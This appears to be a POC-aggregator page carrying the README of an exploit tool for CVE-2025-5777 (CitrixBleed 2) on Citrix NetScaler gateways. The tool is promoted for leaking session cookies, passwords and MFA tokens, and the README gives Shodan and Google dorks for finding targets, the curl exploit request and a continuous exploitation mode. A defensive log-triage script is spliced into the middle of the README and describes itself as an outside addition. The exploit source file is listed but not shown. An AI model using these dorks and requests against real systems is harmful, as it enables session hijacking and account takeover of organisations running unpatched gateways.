Related vulnerability
Description
An advanced, powerful, and easy-to-use tool designed to detect and exploit CVE-2025-5777 (CitrixBleed 2). This script not only identifies the vulnerability but also helps in demonstrating its impact by parsing human-readable information from the memory leak.
Introduction
# CVE-2025-5777: The Ultimate Scanner 🚀

---
### 🔐 CVE: `CVE-2025-5777`
### 🚨 Severity: **Critical**
### 👨💻 Author: `Virendra Kumar & CyberLeelawat`
### 📜 License: [MIT](./LICENSE)
---
An advanced, powerful, and easy-to-use tool designed to detect and exploit **CVE-2025-5777** (aka **CitrixBleed 2**).
This script not only identifies the memory leak vulnerability but **demonstrates real-world impact** by parsing sensitive data like session cookies and credentials directly from leaked memory.
---
## 🧠 What is CVE-2025-5777?
`CVE-2025-5777` is a **critical memory leak vulnerability** in **NetScaler (Citrix) ADC and Gateway** products.
> 🧨 It allows unauthenticated, remote attackers to **leak sensitive memory content** like:
- Session cookies (e.g., `NSC_AAAC`)
- Usernames and passwords
- MFA tokens and more
This can result in **full account takeover** without credentials or MFA, making it a **high-impact RCE-level vulnerability**.
---
## ✨ Features
✅ **High-Speed Asynchronous Scanning**
→ Built with `asyncio` & `aiohttp` to scan targets blazing fast.
✅ **Intelligent Data Extraction**
→ Parses **human-readable strings** from leaked memory (like creds, tokens).
✅ **Sensitive Data Detection**
→ Detects critical patterns like session cookies and flags high-risk data.
✅ **Leak Reporting**
→ Automatically stores leaks into `leaks.txt` for clean offline analysis.
✅ **PoC + Exploitation Loop**
→ Supports one-time check or continuous exploitation mode with `--check` flag.
---
## ⚠️ Disclaimer
> ❗ **This tool is for educational and authorized bug bounty testing only.**
> ❌ Unauthorized use on systems you don’t own or have permission to test is **illegal**.
> 🧑💻 The author is not responsible for any misuse or damage caused by this tool.
---
## 📚 Official References
- [NIST NVD – CVE-2025-5777](https://nvd.nist.gov/vuln/detail/CVE-2025-5777)
- [Citrix Security Advisory – CTX693420](https://support.citrix.com/article/CTX693420)
---
## 🔍 Shodan Dorks
- http.html:"_ctxstxt_NetscalerAAA" ssl.cert.subject.CN:"target.com" port:6443
- title:"Netscaler Gateway" ssl.cert.subject.CN:"target.com" port:6443
- title:"NetScaler AAA" ssl.cert.subject.CN:"target.com" port:6443
- http.favicon.hash:-1166125415 ssl.cert.subject.CN:"target.com" port:6443
- http.favicon.hash:-1292923998 ssl.cert.subject.CN:"target.com" port:6443
---
## 🔎 Google Dorks
- inurl:/logon/LogonPoint/tmindex.html site:target.com
---
## 🌀 Curl Command
```bash
curl -s -k -X POST "https://target.com/p/u/doAuthentication.do" -d "login"
```
Exploit payload path: `https://target.com/p/u/doAuthentication.do`
Use Burp Suite to capture and manipulate the request.
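From a defender's side, the request shape shown above (a POST to `/p/u/doAuthentication.do` whose body is the bare token `login` rather than form-encoded `login=<value>` data) is what a proxy or WAF log can be checked for. The script below is an added example and is not part of this tool or its README; it takes only the path and the bare-token body from the curl command above, while the record layout, the sample events, the source addresses and the repeat threshold are constructed here for illustration.

```python
"""Triage helper for CVE-2025-5777 (CitrixBleed 2) request patterns.

Added example, not part of the tool or the README. Two facts come from the
README: the request path /p/u/doAuthentication.do and a POST body that is the
bare token "login" with no "=value". The log record layout, the sample events
and the repeat threshold are constructed for illustration.
"""
from collections import defaultdict
from urllib.parse import parse_qsl

AUTH_PATH = "/p/u/doAuthentication.do"   # taken from the README's curl command


def body_is_well_formed(body: str) -> bool:
    """True when the body is ordinary form-encoded key=value data that carries
    a 'login' field. strict_parsing makes parse_qsl raise ValueError on a bare
    token such as "login", which is the shape used in the README's curl line."""
    if not body:
        return False
    try:
        pairs = parse_qsl(body, keep_blank_values=True, strict_parsing=True)
    except ValueError:
        return False
    return any(key == "login" for key, _ in pairs)


def is_suspect(event: dict) -> bool:
    """A POST to the auth endpoint whose body is not well-formed form data."""
    return (event.get("method") == "POST"
            and event.get("path") == AUTH_PATH
            and not body_is_well_formed(event.get("body", "")))


def triage(events, repeat_threshold: int = 3) -> dict:
    """Count suspect auth POSTs per source address. The README's tool has a
    continuous mode that repeats the request, so a source sending several
    malformed POSTs is a stronger signal than a single one; the threshold
    value is an assumption of this example."""
    counts = defaultdict(int)
    for ev in events:
        if is_suspect(ev):
            counts[ev["src"]] += 1
    return {
        src: {"malformed_posts": n,
              "verdict": "likely probing" if n >= repeat_threshold else "review"}
        for src, n in counts.items()
    }


# Constructed sample events (not real traffic). A proxy or WAF that records
# request bodies for the auth endpoint would supply records like these.
SAMPLE_EVENTS = [
    {"src": "198.51.100.7", "method": "POST", "path": AUTH_PATH,
     "body": "login=alice&passwd=REDACTED"},
    {"src": "198.51.100.8", "method": "GET",
     "path": "/logon/LogonPoint/tmindex.html", "body": ""},
    {"src": "203.0.113.9", "method": "POST", "path": AUTH_PATH, "body": "login"},
    {"src": "203.0.113.9", "method": "POST", "path": AUTH_PATH, "body": "login"},
    {"src": "203.0.113.9", "method": "POST", "path": AUTH_PATH, "body": "login"},
    {"src": "203.0.113.10", "method": "POST", "path": AUTH_PATH, "body": "passwd=x"},
]

if __name__ == "__main__":
    for src, info in triage(SAMPLE_EVENTS).items():
        print(f"{src}: {info['malformed_posts']} malformed auth POST(s) "
              f"-> {info['verdict']}")
```

The check deliberately keys on body shape rather than on a response signature, so it works on request-side logs without needing to see leaked bytes; a body such as `passwd=x` that is well-formed but lacks the `login` field is also surfaced, at the lower "review" level, so that ordinary form errors are not lost among probing attempts.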
## 🙏 Credits & Acknowledgements
- Tool Developer: Virendra Kumar & CyberLeelawat
- Original Vulnerability Research: The foundational research and original exploit concepts for this vulnerability were published by security researchers at watchTowr Labs and others in the community. This tool builds upon their essential work.
---
## 📜 License
This project is licensed under the MIT License – see the LICENSE file for details.
File snapshot
[4.0K] /data/pocs/627560a288cd67b1c10d9bda258422de53bc2cee
├── [1.1K] CVE-2025-5777.bcheck
├── [2.2K] CVE-2025-5777.yaml
├── [7.6K] exploitveer.py
├── [1.0K] LICENSE
└── [3.2K] README.md
0 directories, 5 files
Notes
1. Accessing the original source is recommended.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of this POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.